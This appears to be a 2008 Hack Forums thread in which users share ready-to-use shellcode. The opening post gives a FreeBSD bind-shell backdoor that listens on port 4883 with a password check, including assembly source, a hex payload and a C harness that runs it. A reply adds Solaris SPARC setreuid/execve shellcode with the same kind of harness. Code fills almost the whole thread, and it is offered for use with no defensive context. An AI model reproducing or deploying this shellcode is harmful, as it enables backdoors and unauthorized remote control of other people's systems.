Hack Forums

Hack Forums > Hacks, Exploits, and Various Discussions > Batch ,Shell, Dos and Command Line Interpreters > Freebsd with a portbind of 4883.
Full Version: Freebsd with a portbind of 4883.
You're currently viewing a stripped down version of our content. View the full version with proper formatting.

Raseilord-Rika

06-22-2008, 04:16 PM
Freebsd with a portbind of 4883.
Simple shell with command auth.
"not by me"

Code:
/*
THE ZUGCODE - SMALL REMOTE 6ACKD0R
FreeBSD i386 bind shell with auth
code by MahDelin
Big thx SST [kaka, nolife, white]
Listen on the port 4883 the /bin/sh
*/

/*
void zugcode(void )
{
//socket
__asm__("xorl     %eax,  %eax");
__asm__("pushl    %eax");
__asm__("pushl    %eax");
__asm__("pushl    $0x01");
__asm__("pushl    $0x02");
__asm__("movl     %esp,  %ebp");
__asm__("pushl    %ebp");
__asm__("movb     $0x61, %al");
__asm__("int      $0x80");

//struct sockaddr_in
__asm__("movl     %eax,    %edi");
__asm__("xorl     %eax,    %eax");
__asm__("movb     $0x02,   9(%ebp)");
__asm__("movw     $0x1313, 10(%ebp)");
__asm__("movl     %eax,    12(%ebp)");
__asm__("leal     8(%ebp), %ecx");

//bind
__asm__("xor      %ebx,%ebx");
__asm__("movb     $0x10,%bl");
__asm__("push     %ebx");
__asm__("push     %ecx");
__asm__("push     %edi");
__asm__("push     %eax");
__asm__("movb     $0x68, %al");
__asm__("int      $0x80");

//listen
__asm__("xor      %eax, %eax");
__asm__("pushl    %eax");
__asm__("pushl    $0x01");
__asm__("pushl    %edi");
__asm__("pushl    %eax");
__asm__("movb     $0x6a, %al");
__asm__("int      $0x80");

//accept
__asm__("xor      %eax, %eax");
__asm__("push     %ebx");
__asm__("pushl    %eax");
__asm__("pushl    %eax");
__asm__("pushl    %edi");
__asm__("pushl    %eax");
__asm__("movb     $0x1e, %al");
__asm__("int      $0x80");

__asm__("mov      %eax, %esi");
__asm__("xor       %eax, %eax");
__asm__("pushl     $0x203a7465");
__asm__("pushl     $0x72636573");
__asm__("movl      %esp, %ebx");
__asm__("push      %eax");
__asm__("push      $0x8");
__asm__("pushl     %ebx");
__asm__("push      %esi");
__asm__("xor       %eax, %eax");
__asm__("push      %eax");
__asm__("movb     $0x65, %al");
__asm__("int      $0x80");

//rcev password
__asm__("xor      %eax, %eax");
__asm__("pushl    %ebp");
__asm__("movl     %esp, %ebp");
__asm__("movb     $0x20, %al");
__asm__("subl     %eax,  %esp");
__asm__("xor      %eax, %eax");
__asm__("push     %eax");
__asm__("mov      $0x80, %al");
__asm__("push     %eax");
__asm__("xor      %eax, %eax");
__asm__("push     %ebp");
__asm__("push     %esi");
__asm__("push     %eax");
__asm__("movb     $0x66, %al");
__asm__("int      $0x80");

//compare password
//save registers %esi, %edi
__asm__("mov     %edi, %ebx");
__asm__("mov     %esi, %edx");
__asm__("mov     %eax, %ecx");
__asm__(".word    0x50eb");
__asm__("pop      %esi");
__asm__("mov      %ebp,     %edi");
__asm__("repe    cmpsb");
__asm__(".word    0x4275");
__asm__("mov     %ebx, %edi");
__asm__("mov     %edx, %esi");

//dup2 stdin
__asm__("xorl     %eax,  %eax");
__asm__("pushl    %eax");
__asm__("pushl    %esi");
__asm__("pushl    %eax");
__asm__("movb     $0x5a, %al");
__asm__("int      $0x80");

//dup2 stdout
__asm__("xorl     %eax,  %eax");
__asm__("inc      %eax");
__asm__("pushl    %eax");
__asm__("pushl    %esi");
__asm__("xorl     %eax,  %eax");
__asm__("pushl    %eax");
__asm__("movb     $0x5a, %al");
__asm__("int      $0x80");

//dup2 stderr
__asm__("xorl     %eax,  %eax");
__asm__("add      $0x2,  %eax");
__asm__("pushl    %eax");
__asm__("pushl    %esi");
__asm__("xorl     %eax,  %eax");
__asm__("pushl    %eax");
__asm__("movb     $0x5a, %al");
__asm__("int      $0x80");

// /bin/sh
__asm__("xor      %ecx, %ecx");
__asm__("pushl    %ecx");
__asm__("pushl    $0x68732f2f");
__asm__("pushl    $0x6e69622f");
__asm__("movl     %esp, %ebx");
__asm__("pushl    %ecx");
__asm__("pushl    %ebx");
__asm__("movl     %esp, %edx");
__asm__("pushl    %ecx");
__asm__("pushl    %edx");
__asm__("pushl    %ebx");
__asm__("pushl    %ecx");
__asm__("movb     $0x3b, %al");
__asm__("int      $0x80");

//exit
__asm__("xorl     %eax,  %eax");
__asm__("inc      %eax");
__asm__("pushl    %eax");
__asm__("pushl    %eax");
__asm__("int      $0x80");

__asm__(".byte  0xe8");
__asm__(".long  0xffffffab");
__asm__(".asciz \"payhash\12\"");
}
*/

unsigned char zug[] =
"\x31\xc0\x50\x50\x6a\x01\x6a\x02\x89\xe5\x55\xb0\x61\xcd\x80\x89\xc7\x31"
"\xc0\xc6\x45\x09\x02\x66\xc7\x45\x0a\x13\x13\x89\x45\x0c\x8d\x4d\x08\x31"
"\xdb\xb3\x10\x53\x51\x57\x50\xb0\x68\xcd\x80\x31\xc0\x50\x6a\x01\x57\x50"
"\xb0\x6a\xcd\x80\x31\xc0\x53\x50\x50\x57\x50\xb0\x1e\xcd\x80\x89\xc6\x31"
"\xc0\x68\x65\x74\x3a\x20\x68\x73\x65\x63\x72\x89\xe3\x50\x6a\x08\x53\x56"
"\x31\xc0\x50\xb0\x65\xcd\x80\x31\xc0\x55\x89\xe5\xb0\x20\x29\xc4\x31\xc0"
"\x50\xb0\x80\x50\x31\xc0\x55\x56\x50\xb0\x66\xcd\x80\x89\xfb\x89\xf2\x89"
"\xc1\xeb\x50\x5e\x89\xef\xf3\xa6\x75\x42\x89\xdf\x89\xd6\x31\xc0\x50\x56"
"\x50\xb0\x5a\xcd\x80\x31\xc0\x40\x50\x56\x31\xc0\x50\xb0\x5a\xcd\x80\x31"
"\xc0\x83\xc0\x02\x50\x56\x31\xc0\x50\xb0\x5a\xcd\x80\x31\xc9\x51\x68\x2f"
"\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x53\x89\xe2\x51\x52\x53\x51"
"\xb0\x3b\xcd\x80\x31\xc0\x40\x50\x50\xcd\x80\xe8\xab\xff\xff\xff\x70\x61"
"\x79\x68\x61\x73\x68\x0a";

main()
{
int (*zugcode)();
printf("shellcode len, %d bytes\n", strlen(zug));
zugcode = (int (*)()) zug;
(int)(*zugcode)();
}

//

japon

06-22-2008, 04:42 PM
Sorry Rasei, but i really don't see whats the point of posting that here ?? Milw0rm has hundreds ;)

Raseilord-Rika

06-22-2008, 04:45 PM
The point of posting it here is that no one else does.
All thats here is batch.
I mean to pollute this sub forum with thousands of shells.

bsdpunk

06-22-2008, 04:49 PM
Sweetage, more assembly for all!

japon

06-22-2008, 04:52 PM
Can I play too?
Here's some super clean execve shell in only 56 bytes for solaris on a sparc
(not mine ;) ):

Code:
/*
* lhall@telegenetic.net
* setreuid shellcode
* full description of how it was done and defines at
* http://www.telegenetic.net/sparc-shellcode.htm
*/

char shellcode[] =
"\x90\x1A\x40\x09"  /* xor %o1, %o1, %o0          */
"\x92\x1A\x40\x09"  /* xor %o1, %o1, %o1          */
"\x82\x10\x20\xCA"  /* mov SYS_SETREUID(202), %g1 */
"\x91\xD0\x20\x08"  /* ta KERNEL(0x08)            */
"\x21\x0B\xD8\x9A"  /* sethi %hi(0x2f626900), %l0 */
"\xA0\x14\x21\x6E"  /* or %l0, %lo(0x16e), %l0    */
"\x23\x0B\xDC\xDA"  /* sethi %hi(0x2f736800), %l1 */
"\xE0\x3B\xBF\xF0"  /* std %l0, [%sp - 0x10]      */
"\x90\x23\xA0\x10"  /* sub %sp, 0x10, %o0         */
"\xD0\x23\xBF\xF8"  /* st  %o0, [%sp - 0x8]       */
"\x92\x23\xA0\x08"  /* sub %sp, 0x8, %o1          */
"\x94\x1A\x80\x0A"  /* xor %o2, %o2, %o2          */
"\x82\x10\x20\x3B"  /* mov SYS_EXECVE(59), %g1    */
"\x91\xD0\x20\x08"; /* ta KERNEL(0x08)            */

int
main (int argc, char **argv)
{
       int (*ret)();
       ret = (int(*)())shellcode;
       (int)(*ret)();
       exit(0);
}
Hack Forums > Hacks, Exploits, and Various Discussions > Batch ,Shell, Dos and Command Line Interpreters > Freebsd with a portbind of 4883.
Reference URL's